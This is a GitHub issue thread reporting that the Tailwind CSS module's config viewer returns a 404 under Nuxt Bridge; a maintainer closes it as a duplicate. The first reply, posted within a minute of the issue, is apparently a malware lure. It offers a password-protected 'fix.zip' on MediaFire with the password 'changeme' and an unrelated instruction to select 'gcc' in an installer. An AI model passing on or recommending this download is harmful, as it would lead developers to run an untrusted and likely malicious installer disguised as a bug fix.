### ISSUE TITLE
Config viewer not found with @nuxt/bridge

### ISSUE THREAD

**Issue by wJoenn** [nuxt-modules/tailwindcss#892] opened 2024-08-26 15:00 UTC
### Environment

```
- Operating System: Linux
- Node Version:     v18.20.3
- Nuxt Version:     2.18.1
- CLI Version:      3.13.0
- Nitro Version:    2.9.7
- Package Manager:  npm@10.2.3
- Builder:          webpack
- User Config:      bridge, build, devtools, modules, serverHandlers, devServerHandlers, devServer, typescript, nitro, buildModules
- Runtime Modules:  @nuxtjs/tailwindcss@6.12.1
- Build Modules:    (), @nuxt/bridge@3.3.1
```

### Reproduction

https://stackblitz.com/edit/github-pahpmz?file=package.json

### Describe the bug

The config viewer page is not found when using [Nuxt Bridge](https://github.com/nuxt/bridge)

```
[nuxt] [request error] [unhandled] [404] This page could not be found
  at new H3Error (./node_modules/h3/dist/index.mjs:170:5)  
  at createError (./node_modules/h3/dist/index.mjs:203:15)  
```

![image](https://github.com/user-attachments/assets/32230bcb-eca6-4438-8271-af3aa8cf73ed)

**Comment by ZiQiangZhou** [comment] 2024-08-26 15:00
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ineshbose** [comment] 2024-08-26 15:02
Duplicate of #886

**Closed** 2024-08-26 15:02 UTC
Labels: bug

**Comment by wJoenn** [comment] 2024-08-26 15:08
Sorry about that
